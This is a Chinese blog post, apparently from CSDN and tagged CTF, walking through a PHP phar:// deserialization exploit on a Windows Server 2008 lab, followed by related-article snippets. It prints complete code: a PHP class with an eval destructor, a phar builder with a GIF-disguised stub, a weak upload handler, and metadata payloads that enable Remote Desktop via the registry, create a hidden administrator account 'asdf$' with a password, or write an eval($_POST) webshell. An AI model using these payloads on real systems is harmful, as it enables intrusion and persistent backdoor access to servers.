phar://反序列化的利用【windows远程登录】

最新推荐文章于 2024-02-21 01:15:26 发布
最新推荐文章于 2024-02-21 01:15:26 发布
阅读量499 收藏 1
点赞数
分类专栏: ctf 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43821278/article/details/118793873
版权

前言

一、环境搭建

​ 

二、详细解释

1.phar反序列化

2.关键1

3.关键2

三、运行测试 

四、总结

前言

看到CTF很多题都有关于phar://绕过文件上传配合反序列化利用的。但是实战中大概率不存在这么巧合的点。

在了解phar://时,看很多博客都是写入phpinfo()来执行的。我突发脑洞,既然可以执行phpinfo,那么可不可以写马获得shell呢?

由于对php对象不是很了解,踩了很多坑记录一下。

windows server 2008、php5.5.38、权限是管理员权限,所以可以远程登录。

一、环境搭建

在phpstudy下。创建一个目录。写入如下几个文件

index.php

<?php
echo "ssss";
$filename=$_GET['filename'];
class AnyClass{
    function __destruct()
    {
        eval($this -> data);
    }
}
file_exists($filename);
?>

 phar_create.php

<?php

class AnyClass{
    function __destruct()
    {
        eval($this -> data);
    }
}
$phar = new Phar('../phar.phar');//上一级目录
$phar -> startBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
$phar -> addFromString('test.txt','test');
$object = new AnyClass();
$object -> data = 'echo `REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f && net user asdf$ 123456...aA /add && net localgroup administrators asdf$ /add`;';
$phar -> setMetadata($object);
$phar -> stopBuffering();
echo 'phar 生成在上一级目录';
?>

 upload.html

<body>
<form action="upload_file.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file" />
    <input type="submit" name="Upload" />
</form>
</body>

upload_file.php

<?php
if (($_FILES["file"]["type"]=="image/gif")&&(substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.')+1))== 'gif') {
    echo "Upload: " . $_FILES["file"]["name"];
    echo "Type: " . $_FILES["file"]["type"];
    echo "Temp file: " . $_FILES["file"]["tmp_name"];

    if (file_exists("upload_file/" . $_FILES["file"]["name"]))
      {
      echo $_FILES["file"]["name"] . " already exists. ";
      }
    else
      {
      move_uploaded_file($_FILES["file"]["tmp_name"],
      "./" .$_FILES["file"]["name"]);
      echo "Stored in: " . "./" . $_FILES["file"]["name"];
      }
    }
else
  {
  echo "Invalid file,you can only upload gif";
  }
?>

浏览器访问 

二、详细解释

1.phar反序列化

具体看其他大牛的博客

2.关键1

主要是index.php中的

    function __destruct()
    {
        eval($this -> data);
    }

所以在file_exists(”phar://../phar.phar“);触发反序列化然后时触发__destruct()执行命令。

3.关键2

本来我是想利用写入文件的,奈何后面在利用时不会执行这条命令,不知道为什么。。。。

$object -> data = 'file_put_contents(”cmd.php“,"<?php eval(\$_POST[cmd]);?>");'

echo `dir`; 加上反引号可以命令执行

$object -> data = 'echo `REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f && net user asdf$ 123456...aA /add && net localgroup administrators asdf$ /add`;';

三、运行测试 

这是生成phar包会产生的效果,对了如果报错说明要修改php.ini 文件,去掉; 改成off

下面我们删除账户关掉3389,net user asdf$ /del && taskkill /pid 6424 /f

 哎呀 忘了改后缀为gif 再上传了。不过没关系效果是一样的。

 payload = filename=phar://../phar.phar

 

 

 

四、总结

其他脑洞可以自行发挥啦 好累 做这个搞了好久好久。。。。。睡觉觉了。。。。。。。。。

旧目难忘
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
序列化反序列用户名与密码
12-11
C#实现序列化用户名,登录密码,委托窗口传递值,文件中查询方法使用Linq表达式
phar是啥?
09-18 787
C#可以把代码打包成dll java可以把代码打包成jar 那么凭什么PHP不可以?实际上在PHP5.3之后就出现了类似的东西叫做phar新建build.txt:<?php$phar = new Phar("test.phar"); $phar->buildFromDirectory(__DIR__.'/files','/\.php$/'); //编译files目录下的所有.php文件 $p
phar反序列化原理及利用
cike_y
02-21 1264
phar协议的利用,及漏洞的产生
序列化和反序列化、单点登入
jue6628的博客
07-12 219
序列化:      导入pom.xml <!-- https://mvnrepository.com/artifact/redis.clients/jedis --> <dependency> <groupId>redis.clients</groupId> <ar...
反序列化可以记录账号密码实现自动登录
ADC06的博客
05-19 322
一.反序列化 (1) 作用: 1. 可以记录账号和密码。 2. 可以取出实现账号登录。 (2) 创建RememberAccount.txt 1.代码: // Debug路径下创建一个文件RememberAccount.txt保存账号和密码; string strPath = AppDomain.CurrentDomain.BaseDirectory + "RememberAccount.txt"; // * (2)记住秘密为true, if (IsRemem...
一个phar://的漏洞
Xi4or0uji
10-17 5757
前段时间打了个护网杯,题目质量是真的高,肉鸡又菜了一整场,遇到了一个不太会的东西,复现了一波,记录下好吧。 这个鬼东西就是phar://的序列化的漏洞 介绍一下 phar://跟php://filter 、data://那些一样,都是流包装,可以将一组php文件进行打包,可以创建默认执行的stub stub 就是一个标志,格式xxx&lt;?php xxxxx; __HALT_COMPIL...
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
ppm.phar:ppm相
05-18
wget https://raw.githubusercontent.com/hernandev/ppm.phar/1.0.2/dist/ppm.phar chmod +x ppm.phar 用法 ppm.phar文件只是PPM的包装,这意味着您可以ppm.phar按照直接安装PPM的方式来使用ppm.phar 。 例子: ...
mix-phar-skeleton:Phar命令行程序开发框架
04-24
Mix Phar Skeleton 命令行单执行文件 Phar 开发程序骨架,Mix 封装的命令行基础设施在骨架中都可使用。 我们提供了打包工具 ,可以将本项目打包为 Phar 文件(就像 golang 编译成执行文件一样)。 PHP 原本就是一个...
phar:诗篇的Phar居住在作曲家版本环境中的地方
02-13
这使您可以安装而不必担心作曲家之间的冲突。
phive:Phar安装和验证环境(PHIVE)
05-02
变得富有PHIVE的安装非常简单,大约在上一次您必须手动执行与phar相关的任何操作时。 从我们的GitHub页面的部分中获取PHIVE副本,或按照以下简单步骤操作: wget -O phive.phar " https://phar.io/releases/phive.p
phar
weixin_44894463的博客
07-10 428
使用phar反序列化,和文件包含里面使用。 首先是反序列化利用条件可以文件上传,文件函数的参数可以控制,要有魔术方法作为跳板。 首先使用内置的 Phar 来创建phar 文件,然后上传,找到可以操控的文件函数, 比如这个$filename = ‘phar://phar.phar/1dasda.txt’; file_get_contents($filename); 在创建phar文件的时候在里...
PHPphar相关
元俊up
04-23 445
创建PHAR文件: phar官方文档 查看phar.readonly的配置。需要修改php.ini文件设置 phar.readonly=0 否则: php -i | grep phar 编辑 index.php <?php echo "This is a phar test ."; echo PHP_EOL; createPhar.php <?php $srcRoot = ...
------已搬运-------PHP反序列化之三:phar://反序列化之☞菜鸡的总结
Zero_Adam的博客
01-29 383
讲真,写道一半后悔了,,,网上说。这个好像不怎么出题。而且现实中这个漏洞也比较少。。。哭了呀,,━┳━…━┳━ (本????还没有看POP链…)看了这么多文章,先总体上说说吧。这个**phar://**只是反序列化漏洞中的一个分支。 个人理解:**phar://**之所以拿出来,单独成知识点,有一点原因就是可以不用unserialize()方法,但是仍然会调用php反序列化。 只要有反序列化,那么就很可能有反序列化漏洞。要有反序列化漏洞,就一定要有反序列化这个步骤。可以是unserialize(),也可
反序列化漏洞 (2)------php 反序列化漏洞 ----- session反序列化问题,phar,pop,绕过__wakeup()
Z_Grant的博客
11-19 1480
文章目录一、漏洞简述php反序列化漏洞又称对象注入二、漏洞利用过程(1) 绕过__wakeup()的限制三、Session反序列化漏洞(1) Session序列化机制PHP处理器的三种序列化方式:配置文件 php.ini 的说明 一、漏洞简述php反序列化漏洞又称对象注入 原理:在php反序列化的时候,反序列化的内容可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函...
代码审计 | [CISCN2019 华北赛区 Day1 Web1]Dropbox | phar反序列化实施远程代码攻击
crispr的博客
02-18 389
phar反序列化实施远程代码攻击 0X01 前言 记录一道CISCN的真题,让我对phar反序列化有更深层次的理解和应用,也对代码审计有了新的感悟,知道了在不使用php函数unserialize()同样引起PHP对象注入 参考链接: https://xz.aliyun.com/t/2715 https://www.cnblogs.com/kevinbruce656/p/11316070.html...
phpphar后缀,使用phar实现php反序列化
weixin_31948907的博客
03-10 166
前言一般说到反序列化漏洞,第一反应都是unserialize()函数。然而安全研究员Sam Thomas分享了议题It’s a PHP unserialization vulnerability Jim, but not as we know it,利用phar伪协议会将用户自定义的meta-data序列化的形式存储这一特性,扩展php反序列化的攻击面。一般来说,文件操作都是可以触发phar反序列...
pop链构造和phar://协议
qq_48511129的博客
12-13 693
phar类似java中的jar包,是一种压缩包。可以对php项目进行打包成 .phar类型的文件,也可以把某个功能模块打包直接发布。 1.配置 要想使用phar文件,必须将phar.readonly配置项配置为0或Off <?php class B{ public function __destruct(){ echo $this -> name; } } $phar = new Phar("test.phar"); $phar -> startBuff
封神台-掌控者新靶场 - Kali系列4题
热门推荐
weixin_43821278的博客
03-11 1万+
新靶场 - Kali系列【4题】 Kali渗透 - Sqlmap实操靶场
phar://伪协议
最新发布
02-28
$content = file_get_contents('phar://path/to/file.phar/file.txt'); ``` 2. 执行.phar文件中的PHP脚本: ```php include 'phar://path/to/file.phar/script.php'; ``` 3. 写入内容到.phar文件中: ```php...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值